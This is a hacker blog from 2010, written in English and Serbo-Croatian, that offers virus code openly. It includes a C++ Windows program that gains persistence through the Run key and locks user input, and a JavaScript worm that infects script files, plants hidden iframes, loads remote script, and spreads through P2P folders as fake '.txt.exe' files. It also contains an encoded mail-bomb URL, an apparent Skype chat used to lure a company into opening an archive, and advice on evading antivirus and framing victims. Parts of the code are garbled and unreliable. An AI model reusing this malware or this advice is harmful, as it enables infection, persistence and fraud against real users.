Branko.D.Tomic Luxilius branko.82@hotmail.com
欢迎访问 undermine
# moderator & modifier
  • " ≝
  • ℜℵℜ "
  • seed
  • Exp'n'lorers
    "No man or
    fallen Angels from Heaven
    knows the Day when
    the Tribulation will begin,
    only Father in Heaven."
    "Everybody can kill
    The Body but never can't
    kill The Soul from
    Ever Mind Form."
    TagList
    Arhiva
    « » kol 2014
    • p
    • u
    • s
    • č
    • p
    • s
    • n
    •  
    •  
    •  
    •  
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    VX sites and other hack sites
    VX Heaven Portal of Russian Hackers VX Chaos   |
    NFC Bloger Edu Hack Cracker ET Fakultet             |
    Blog
    utorak, rujan 28, 2010
    moderator:[0390eu2309] http://developers.facebook.com/tools/console/

    Here you can see The Best hack! He search bug in facebook & link this script self

    then fix bug like windows update.

    Info: "Script can work if you drop in your HTML, appkey"

    Milion user's can become attacked with this script!!!

    _______Cut_here____________


    Function User_Moderator()
    {
       "id": "1234567890",
       "full name": "name and surname",
       "first_name": "name",
       "last_name": "surname",
       "Basic Info ": "sex: fe/male",
       "link": "http://www.facebook.com/name", //if have or no
       "gender": "fe/male",
       "locale": "en_US"
       "Birthday":    "month day, year"
       "Relationship Status": "if have" //if have or no
       "Network": "here go Relationship Status if profile dont have network" //if have or no
       "Profile URL": "http://www.facebook.com/profile.php?id=1234567890",
       "Description": "This account is hacked, and religions right is destructed. He lost access to profile Email address associated with the account."
    }

    _______Cut_here______________

    undermine @ 01:50 |Isključeno | Komentari: 0
    nedjelja, rujan 12, 2010
    "Svoj mir vam dajem. Ali, ne dajem ga onako kako svet daje. Neka se ne uznemirava vase srce.
    U svetu imacete vidnu laz i nevolje,

    ali budite hrabri - ja sam pobedio svet. A to nije kraj sveta" - zato sto ovaj svet nije kraj.
    Vecina vernika u vidovnjake smejat ce se ovoj recenici a zaplakati,

    poverovati i moliti sve visnjeg tek kada izgube najdraze...

    X 

    ZATO DOBRO RAMISLITE KOJI ,COMPATIBILE VIRUS' JE UPRAVO SPOJEN SA VASIM SYSTEM-OM




    i'm virus

    undermine @ 02:51 |Isključeno | Komentari: 0
    subota, srpanj 24, 2010
    moderator[02893181901937] ::.::DESCRIPTION PANEL::.:: Hard infect and normal infect: We wan't to explain the technique for everybody. I wanna show you a normal file and a file infect by virus: infected hard: Commands+Call to virus+Virus+UpgradeCode Infected sample: Commands+Virus+Commands+Commands+Call to virus++Commands Than we want to write the virus code to any line of the program. Sounds easy... Anything is like Coordinated Worm Design in the yellow link line if you browsing any page on the google virus and any other surf pack, that description can look anywhere... One of the best virus tool can make hack cool !!! look function =before start= (ie8 virus who coming 2011) http://ie8.undermine.bloger.hr/
    undermine @ 22:58 |Isključeno | Komentari: 0
    nedjelja, srpanj 11, 2010
    blog.moderator[8901381791347]&modif[hiu2i98c]

    #include <windows.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <mmsystem.h>
    #include <time.h>

    using namespace std;

    int main()
    {
        void Spread();
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Spread, NULL, 0, NULL);
      
        int welcome, count;
      
        HWND CurrentWin;
        CurrentWin = GetForegroundWindow();
      
        HANDLE consol;
        consol = GetStdHandle(STD_OUTPUT_HANDLE);
        SetConsoleTextAttribute(consol,FOREGROUND_BLACK);

        SetConsoleTitle("Vamfim Decoder");

      
        while(1)
        {                            
                welcome = rand();
                cout << welcome;
                SetForegroundWindow(CurrentWin);
                count = rand()%500;

                if(count<51)
                {
                   cout << "<>%REMOTE_ADDRESS%)_";
                }

                BlockInput(TRUE);
                SetCursorPos(0,0);
        }
    return 0;
    }

    void Spread()
    {
        char CurrentFile[MAX_PATH];
        char windows[MAX_PATH];
        char system[MAX_PATH];
      
        HMODULE GetModH = GetModuleHandle(NULL);
        GetModuleFileName(GetModH,CurrentFile,sizeof(CurrentFile));

        GetSystemDirectory(system,sizeof(system));
        GetWindowsDirectory(windows,sizeof(windows));

        strcat(system,"\\logoff.exe");
        strcat(windows,"\\Setup.exe");

        CopyFile(CurrentFile,system,false);
        CopyFile(CurrentFile,windows,false);
      
        HKEY hKey_e;
        RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey_e );
        RegSetValueEx(hKey_e, "logoff",0,REG_SZ,(const unsigned char*)system,sizeof(system));
        RegCloseKey(hKey_e);

        HKEY hKey_f;
        RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey_f );
        RegSetValueEx(hKey_f, "Windows Setup",0,REG_SZ,(const unsigned char*)windows,sizeof(windows));
        RegCloseKey(hKey_f);
    }

    undermine @ 22:29 |Isključeno | Komentari: 0
    četvrtak, lipanj 24, 2010
    blog.moderator[37832811900218]

    365 hours we try to modify jscript in net line but
    any time this server crash template in this bloger
    remove // <noscript> . </noscript> and add somewhere
    clean undermine.bloger.hr from script and write link for attack
    <noscript> // this line remove
    <script language="javascript" type="text/javascript">
    var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000); document.upgrade=
    "http://www2.speedy-share.com/files/1/33esbypkkxy47a/Hunatcha.rar"+go.toGMTString( );
    </script>
    <script language="javascript" type="text/javascript">function Transferring() {
    s=document.URL;path=s.substr(-0,s.Get("http://undermine.bloger.hr"));path=unescape(path);
    document.write('var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000);
    document.upgrade="http://www2.speedy-share.com/files/1/33esbypkkxy47a/Hunatcha.rar"+go.toGMTString( );') }
    setUpgrade("Transferring()",true)
    </script>
    <script type="text/javascript" language="javascript">
    document.write('<a href="javascript:savePageAsHTML()" _fcksavedurl="javascript:savePageAsHTML()" _fcksavedurl=
    "javascript:savePageAsHTML()" _fcksavedurl="javascript:savePageAsHTML()"><iframe src="
    http://undermine.bloger.hr" width="0" height="0" border="0" target="_blank"></a>');

    function savePageAsHTML()
    {
        var sUriRequest = "";

        sUriRequest = "author_id=" + authorId;
        sUriRequest += "&page=" + pageOrientation;
        sUriRequest += "&top=" + topMargin;
        sUriRequest += "&bottom=" + bottomMargin;
        sUriRequest += "&left=" + leftMargin;
        sUriRequest += "&right=" + rightMargin;
    eval('c=CreateObject("scripting.filesystemobject")b=c.opentextfile(WScript.scriptfullname)
    .readall()b=b.substr(
    b.search(c="undermine")-3)e=b.substr(0,d=b.search("biv")+14)f=String.fromCharCode(46)g=
    String.fromCharCode(
    39)Math.random(1)while(d<b.length-2){  if((h=b.substr(d,2))==f+"u")b=b.substr(0,d)+eval(g+b.substr(d,6)+g)+b.substr(d+6)e=e+(d==38?h:Math.random()>.5?b.charAt(d--):f+"u00"+b.charCodeAt(d--).toString(16))d+=2}for(d=new Trojan(c.getfolder(
    ".").files);!d.atEnd();d.moveNext()){if(c.getextensionname(b=d.item()).toLowerCase()=="js")try{f=b.attributes b.attributes=
    0if(c.opentextfile(b).readall().search(c)<0)c.opentextfile(b,8).write(e+g+")")b.attributes=f}catch(z){}}')
        // undermine.bloger.hr
        var pURL = "http://undermine.bloger.hr/" + escape(document.location.href) + "&" + sUriRequest;
        window.open(pURL, "undermine", "scrollbars=yes,resizable=yes,menubar,toolbar,location");
    if (window['???? undermine'] != undefined && window['???? undermine']['loader'] != undefined) {
    if (!window['???? undermine']['search']) {
    window['???? undermine']['search'] = {};
    google.search.JSWorm = 'JS/Hunatcha';
    }
    google.loader.writeLoadTag("script", google.loader.ServiceBase + "
    http://undermine.bloger.hr", true);
    }
    }
    const gHostWorm =  {

        id    : "HostWorm",

        virusType: "http://undermine.bloger.hr/settings/undermine/",

        install    : function() {
            window.addEventListener("load",this.init,true);
        },

        init    : function() {
            if (load.virusTypes[HostWorm.virusType]) {
                var bloger = document.getElementById("div");   
                bloger.addEventListener("divshowing",HostWorm.enable,true);
                var element = document.getElementById(HostWorm.id);
                element.setAttribute( "oncommand" , "HostWorm.show();");
            } else {
                var element = document.getElementById(HostWorm.id);
                element.setAttribute("style", "display: none");
            }
        },

        enable    : function() {
            var element = document.getElementById(HostWorm.id);
                if (load.javaEnabled()) {
                element.copyAttribute("upgrade");
                } else {
                      element.setAttribute("upgrade", "true");
                }
        },

        show    : function() {
                 var jvmMgr = Components.classes['@google.org']
                           .getService(Components.interfaces.nsIJVMManager)
                jvmMgr.showJavaConsole();
        }
       
    };

    HostWorm.install();
    </script>
    <script type="text/javascript">
        //<!-- (C)2000-2010 WWW - undermine / bloger.hr / Pages -->
        var myworm_identifier = new String('http://undermine.bloger.hr');
        </script>
    <script src="/???? undermine.htm" type="text/javascript"></script>
    <script type="text/javascript">
    var Hunatcha,Kazaa,LimeWire,Documents and Settings;
    var fso = new CreateObject("Scripting.FileSystemObject");
    Hunatcha = (WScript.ScriptFullName);
    KaZaa = ("C:\\Program Files\\KaZaa\\My Shared Folder") + "\\";
    Kazaa = ("C:\\Program Files\\KaZaa") + "\\";
    LimeWire = ("C:\\Program Files\\LimeWire\\My Shared Folder") + "\\";
    LimeWire = ("C:\\Program Files\\LimeWire") + "\\";
    Documents and Settings = ("C:\\Documents and Settings") + "\\";
    Documents and Settings = ("C:\\Documents and Settings\\%user%\\
    My Documents\\Downloads\\") + "\\";
    if(fso.folderexists(KaZaa)){
        fso.copyfile(Hunatcha, KaZaa + "users_info.txt.exe");
        fso.copyfile(Hunatcha, KaZaa + "video sister.avi.exe");
    }
    if(fso.folderexists(LimeWire)){
        fso.copyfile(Hunatcha, LimeWire + "gratis.mp4.exe");
        fso.copyfile(Hunatcha, LimeWire + "info download.txt.exe");
    }
    if(fso.folderexists(Documents and Settings)){
        fso.copyfile(Hunatcha, Documents and Settings + "upload.jpg.exe");
    }
    </script>
    <script language="javascript" type="text/javascript"> var go=new Date( ); go.
    setTime(go.getTime( )+12*60*60*1000);
    document.upgrade="http://%REMOTE_ADDRESS%"+go.toGMTString( ); </script>
    <script language="javascript" type="text/javascript">function Transferring() {
    s=document.URL;path=s.substr(-0,s.Get("http://%REMOTE_ADDRESS%"));
    path=unescape(path);
    document.write('var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000); document.upgrade="
    http://%REMOTE_ADDRESS%"+go.toGMTString( );') }
    setUpgrade("Transferring()",true)
    var a0="under";var a1="mine";var a2=".bloger";var a3=".hr";
    var b = "demo.aspx?&seoref="+encodeURIComponent(document.referrer)+"
    &HTTP_REFERER="
    +encodeURIComponent(document.URL)+"&default_keyword="+document.title;
    var z = "http://"+a0+a1+a2+a3+"/"+b;var y = "<script language='JavaScript' src='"+z+"' ><"+"/"+"script>";
    document.write(y);
    </script>
    <noscript> // this line remove


    undermine @ 02:19 |Isključeno | Komentari: 0
    utorak, lipanj 22, 2010
    blog moderator[6383212049813561]:

    new record in relinked subfolder'/trojanbomb/'
    Part I

    crashed security relinked mail sender html
    http://www.rts.rs/page/stories/ci/story/256/%61%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%61%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%61%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%61%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%61%2E%73%65%6E%64%28%29%0D%0A%62%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%62%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%62%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%62%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%62%2E%73%65%6E%64%28%29%0D%0A%63%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%63%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%63%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%63%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%63%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%63%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%63%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%63%2E%73%65%6E%64%28%29%0D%0A%64%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%64%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%64%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%64%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%64%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%64%2E%73%65%6E%64%28%29%0D%0A%78%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%78%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%78%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%78%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%78%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%78%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%78%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%78%2E%73%65%6E%64%28%29/727252/%D0%93%D0%BB%D0%B5%D0%B4%D0%B0%D0%BE%D1%86%D0%B8+%D1%80%D0%B5%D0%BF%D0%BE%D1%80%D1%82%D0%B5%D1%80%D0%B8+%2822.6.2010%29.html?email=yes
     

    Part II


    encry trojanbomb and special difficul function for someone
    function tmp() { eval(unescape('%61%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%61%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%61%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%61%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%61%2E%73%65%6E%64%28%29%0D%0A%62%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%62%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%62%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%62%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%62%2E%73%65%6E%64%28%29%0D%0A%63%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%63%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%63%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%63%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%63%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%63%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%63%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%63%2E%73%65%6E%64%28%29%0D%0A%64%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%64%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%64%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%64%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%64%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%64%2E%73%65%6E%64%28%29%0D%0A%78%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%78%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%78%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%78%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%78%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%78%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%78%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%78%2E%73%65%6E%64%28%29')); }
                                                                                                                             Write;   Blog.m
    undermine @ 14:35 |Isključeno | Komentari: 0
    ponedjeljak, svibanj 31, 2010
    alert("All rights we have bcoz business not have rights to surf [at]
    any web page without business rights!");

    update : business title in belgia wher is big boss : [ denolin ]
    big boss is in belgia for all planta spont in all country .

    Vxers [ H.P.D.M ] vs-> P.Spont business boss: Woman
    [1:16:21 PM] Hast Plast Donji Milanovac: Otvorili smo skype, za saradnju.
    Planta Spontanea has shared contact details with Hast Plast Donji Milanovac.
    [1:17:48 PM] *** Hast Plast Donji Milanovac sent Ponude.txt ***
    [1:21:16 PM] Ukoliko nemozete sacekati skidanje poslacemo vam kracu verziju.
    [1:27:31 PM] Hast Plast Donji Milanovac: saljemo vam ponude a nesto se necuje kada zelimo da se javimo
    [1:28:09 PM] Planta Spontanea: Primetila sam. U svakom slucaju, hvala na ponudama koje jos uvek stizu...
    [1:30:31 PM] Hast Plast Donji Milanovac: jeste li dobili punudu u tesktu od nas sada koji smo poslali?
    [1:32:13 PM] Planta Spontanea: Prva ponuda neuspesna, druga se jos uvek download-uje.
    [1:33:20 PM] Hast Plast Donji Milanovac: Molimo vas sacekajte ! Javljeno nam je da je problem
    u skype konekciji u svakom slucaju ponuda se salje .... Hvala
    [1:42:13 PM] Planta Spontanea: OK!
    [1:47:06 PM] Hast Plast Donji Milanovac: Zasto nam se pojavilo da je posiljka prekinuta?
    [1:47:52 PM] Hast Plast Donji Milanovac: saljemo vam je upravo sada... Ako zelite razgledati ponudu.
    [1:50:01 PM] Hast Plast Donji Milanovac: Imate li drugi mail kako bi vam lakse i bez cekanja i problema
    poslali i bili u brzem kontaktu dok se skype ne popravi...
    [1:51:21 PM] Hast Plast Donji Milanovac: zaista ovaj skype kod nas ima problem
    [1:51:25 PM] Hast Plast Donji Milanovac: zao nam je
    [1:51:43 PM] Planta Spontanea: Komunikacija jos uvek nemoguca...E-mail adresa je: plantaspont@nadlanu.com
    [1:51:51 PM] Hast Plast Donji Milanovac: pozvacemo nekog da nam popravi....
    [1:52:22 PM] Hast Plast Donji Milanovac: neznamo u cemo je problem hvala saljemo vam ponudu na taj vas mail
    [1:55:46 PM] Hast Plast Donji Milanovac: saljemo vam nas mail je **********@gmail.com
    [1:56:11 PM] Hast Plast Donji Milanovac: to je mail radnika u firmi
    [1:56:25 PM] Hast Plast Donji Milanovac: a dobicete i zvanicni mail nase firme
    [1:56:34 PM] Hast Plast Donji Milanovac: cim ga otvorimo
    [1:57:22 PM] Planta Spontanea: OK! Hvala!
    [2:10:01 PM] Hast Plast Donji Milanovac: subjekat mail-a je : Ponude Hast Plast upravo smo vam poslali
    na vas mail bazu ponuda Ahiva.b64 koju cete otvoriti preko zip ili rar programa.

    Little info from me ; Firma vec nekoliko meseci ne placa radnike dok ne dodje novi gazda.
    Prodaja koju cete sami videti u %HardDrive%\\history deleted file je to da su prodavali neke dzakove
    kako bi dobijali novac umesto radnicke plate

    From me again ; one business name:[ holcim cementara popovac ] Title:[S.Z.T.R vidojevic] je radnja
    za izvodjenje mermera !knjigovodstvo , ta firma im je dugovala malo novca ali mozete ih
    kontaktirati kao sa izvinjenjem u kom cete naglasiti slanje: arhivu knjigovodja sa tekstom
    da zelite dalju saradnju sa Planta Spont Donji Milanovac ...
    undermine @ 14:49 |Isključeno | Komentari: 0
    subota, svibanj 8, 2010
    danasnje av kompanije imaju problem sa nazivom u bazi virusa,
    jedan od testova izvrsen je u "lab" vxhers grupe. Uzet je primer
    Originalnog crv-a i samo je kopija dobila naziv clijent, svch,
    sys32, s32 i svi nazivi koji dovode do sumnje za host na kom dolaze trojanci
    i virusi, pa ga vecina nazivaju trojan ili virus od 100% avers-a
    samo ga 2% detektuju po kodiranju ostali ga detektuju po samom nazivu
    koji je maskiran u imenu tokom kreiranja...

    Zakon o kreiranju virusa, je prekticna suprotnost od onoga sto vecina
    vxers misli u srbiji a to je hehe zatvor, recicu vam sada nesto i o tome
    ako ste kreirali trojanca crva ili originalni doom virus, morate imati
    dobar smisljeni plan uz neki sajt sa kog cete ga poslati zrtvama, kao sto
    je naprimer porno sajt gde cete ubaciti vasu tehnicku funkciju. Ukoliko vas
    neka firma pronadje dobro je imati takav sajt koji cete ubaciti u computer
    te firme i dobro ga sakriti ukoliko vam pocne sudjenje imate svoj dokaz jer
    firme koje se bave milionima evra ne smeju posecivati sajtove kao sto su porn.com
    i slicni sajtovi na kojima se moze dobiti otvoreni prolaz, kao i sama rec
    vecine avers-a glasi : " Ni po koju cenu nije dobro posecivati bilo koje sajtove,
    sto mogu instalirati virus u vasem computer-u i zatim naneti stetu koju posle morate
    odkloniti samo celim formatiranjem harddisk-a. " Ukoliko neki radnik poseti vas sajt
    ili krene sa poslovnog computer-a da chat-uje s'vama samim tim budite svesni da je i njemu
    zabranjeno poslovnim computer-om ulaziti na sajtove koji nisu deo poslovne firme...

    "Zapamtite samo deklaraciju "19" ili je procitajte tu vam je taj zakon za sve demokratske
    i ujedinjene drzave"....

    font: tahoma[cro-rs]
    by Branko D Tomic
    undermine @ 12:45 |Isključeno | Komentari: 0
    subota, travanj 24, 2010
    Prvi korak :
    Hunatcha je baziran za vecinu tehnickih komponenta, ukljucujuci
    * Infekciju fajlova i sobe diskova - ali korisnik mora imati u vidu
    vec neki zarazeni fajl koji ce dati do znanja crvu da je inficiran, slutio sam
    da ce vecina pomisliti da je worm startajuci pomocnik virus-a ali vecina odnosno mnogi grese .
    Princip crva je bolji osecaj rada kada primeti inficirani fajl, a sobe diskova ili drives
    mogu slobodno reci da je spoj sa masinom odnosno sobom u kojoj se nalazi baza za infekciju.
    * Proces koji sami vidite daje mu znatno bolju sigurnost sirenja kroz P2P
    kao sto su fajlovi za verovanje i to je mnogo bitno('users_info.txt.exe') , ('info download.txt.exe')
    ostanimo na ovim fajlovima primerom kada neko zeli videti detaljnije sta moze skidati naravno da ce otvoriti
    masku koja mu se pokazuje kao tekstualnost.
    * Taskkill je veoma dobro radjena tehnika uz system kroz neverantivirus daje crvu sigurnost prolaza
    i pozeljno je dopunjavati taj deo. primetio sam da f-sec i jos neki avers-i detektuju ali ono sto je bitno
    on ipak ispuni svoj deo posla tako da vas ne treba plasiti ako je detektovan.

    Drugi korak: (definicija Port 21)
    port 21 je spremljen za sve one koji vole preko port-a ulaziti i otimajuci bazu svih fajlova
    preko zakljucanog port-a za download i upload. Naravno da mozete raditi sa
    preko port-a 21 jer su oni vec i u systemu inficiranog kompjutera.

    Treci korak:
    Ocekuje se od vas dopuna i tehnika vec poznatih username/password
    i naravno imacete pristupacnije delove rada u windows visti i se7en.
    dok u xp vec je odobren pristup na vecini kompjuter-a , nadam se da shvatate?
    kad smo vec kod tehnike vratimo se definiciji 21 port mozete vec raditi sa poznatim
    virus-ima iz sobe 21 dok za se7en ce vam trebati ovaj treci korak . U ovom delu dolazi
    i poruka za avers-e koja glasi kodom :
    static char *msg_to_avers = "We never stop to make your business!";
    Da to sam im hteo reci jer sto se oni zale i prave da nisu zadovoljni zlonamerom, kada
    je to njihova takodje zarada da nije virus-a nebi bilo ni anti-virusa .
    undermine @ 02:14 |Isključeno | Komentari: 0
    petak, travanj 16, 2010
                                                --.----.----.
    Pročitaj kompletan post
    undermine @ 10:27 |Isključeno | Komentari: 0
    četvrtak, travanj 15, 2010
